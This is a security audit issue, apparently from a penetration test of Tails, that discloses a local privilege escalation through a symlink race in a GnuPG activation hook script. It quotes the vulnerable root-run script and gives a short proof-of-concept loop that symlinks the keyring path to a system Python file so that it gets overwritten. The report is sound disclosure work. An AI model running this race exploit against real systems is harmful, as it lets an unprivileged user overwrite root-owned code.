Skip to content

TPS - Local Privilege Escalation (LPE) via symlink race condition in GnuPG activation hook

https://git.radicallyopensecurity.com/ros/pen-tails/-/issues/5

Technical Description

/local/lib/persistent-storage/on-activated-hooks/GnuPG/maybe-restore-gnupg-pubring

#!/bin/sh

# refs: #17807

set -eu

KEYRING="/home/amnesia/.gnupg/pubring.kbx"
KEYRING_BAK="${KEYRING}~"
KEYRING_SIZE="$(stat -c %s ${KEYRING} || echo 0)"

if [ ! -f "${KEYRING}" ] || [ "${KEYRING_SIZE}" -le 32 ]; then
  echo >&2 "warning: It seems the GnuPG keyring is corrupt"
  if [ -f "${KEYRING_BAK}" ]; then
    echo >&2 "warning: Restoring backup of GnuPG keyring"
    cp "${KEYRING_BAK}" "${KEYRING}"
    chmod u=rw,go= "${KEYRING}"
  fi
fi

Impact

POC:

  1. Overwrite pubring.kbx~ with attacker-controlled content.
  2. run pwn.sh
  3. Activate / Deactivate several times the GnuPG Feature of the persistent Storage until the Race Condition Window is hit -> This can be automated via a socket auth script?

pwn.sh

#!/bin/bash
while :
do
  rm -rf /home/amnesia/.gnupg/pubring.kbx;
  ln -sf /usr/lib/python3/dist-packages/tailslib/netnsdrop.py /home/amnesia/.gnupg/pubring.kbx;
done

Recommendation

Type

To upload designs, you'll need to enable LFS and have an admin enable hashed storage. More information